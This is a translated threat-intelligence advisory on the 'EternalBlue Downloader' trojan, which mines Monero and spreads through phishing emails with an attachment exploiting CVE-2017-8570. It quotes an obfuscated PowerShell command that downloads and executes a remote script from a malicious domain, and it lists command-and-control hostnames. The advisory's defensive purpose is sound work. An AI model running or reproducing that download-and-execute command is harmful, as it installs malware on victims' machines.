"EternalBlue Downloader Trojan" adds phishing emails to spread, using user machines to mine Monero

Source: Tencent Yujian Threat Intelligence Center

Editor's note: The original title is "The "Eternal Blue Downloader Trojan" has been spread through new phishing emails, and the attachment contains the CVE-2017-8570 vulnerability attack code"

After the "Eternal Blue" downloader Trojan runs on the infected user's machine, it will automatically open the current user's email address book and send a document with the attachment "urgent.doc", which contains the attack code for the CVE-2017-8570 vulnerability (a high-risk Office vulnerability, also known as Sandworm II).

If the attacked user receives the email and accidentally opens the document, the vulnerability may be triggered to execute the Powershell command to download mail.jsp:

 C:/Windows/System32/cmd.exe /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

The domain name ap35nf7.jp used for downloading is not actually registered, but it can still be resolved to the address: t.awcna.com. This is because the local hosts file of the infected machine has been tampered with, so that the randomly generated domain name is mapped to the malicious address used by the Trojan. For details, please refer to the report previously released by the Yujian Threat Intelligence Center: "The "Eternal Blue Downloader" Trojan tampers with hosts to point to random domain names, and then uses multiple vulnerabilities to attack intranet mining."

During this attack, the Trojan will use randomly generated characters plus the suffix ".cn" or ".jp" or ".kr" as the DGA domain name and point to the domain name in the hosts file:

 t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp is highly obfuscated. After multiple decryptions, we can see that it installs multiple scheduled tasks to download Powershell scripts for execution, and uses a new scheduled task name: "Bluetea".

The "Eternal Blue" downloader Trojan has never stopped updating since its appearance. From the initial PE sample attack to the later transfer to the Powershell fileless attack to avoid detection, and to persist by installing multiple types of scheduled tasks. In terms of the propagation method, after initially accumulating a batch of infected machines through supply chain attacks, it continued to spread by using the "Eternal Blue" vulnerability, MSSql blasting, $IPC blasting, RDP blasting and other methods. Recently, DGA domain name attacks and phishing email attacks have been added. Its ultimate goal is only to use user machines to mine Monero for profit.

The previous versions of the EternalBlue Downloader Trojan are updated in the following table:

Safety Tips

1. It is recommended that users do not easily open email attachments from unknown sources, and be extremely cautious when running files in email attachments. If you find any scripts or other executable files, use antivirus software to scan them first;

2. The server uses a secure password policy, especially IPC$, MSSQL, and RDP account passwords. Do not use weak passwords to avoid weak password brute force attacks;

3. According to the Microsoft security announcement, promptly fix the Office vulnerability CVE-2017-8570. Vulnerability scanning and repair are required, or Windows Update is used.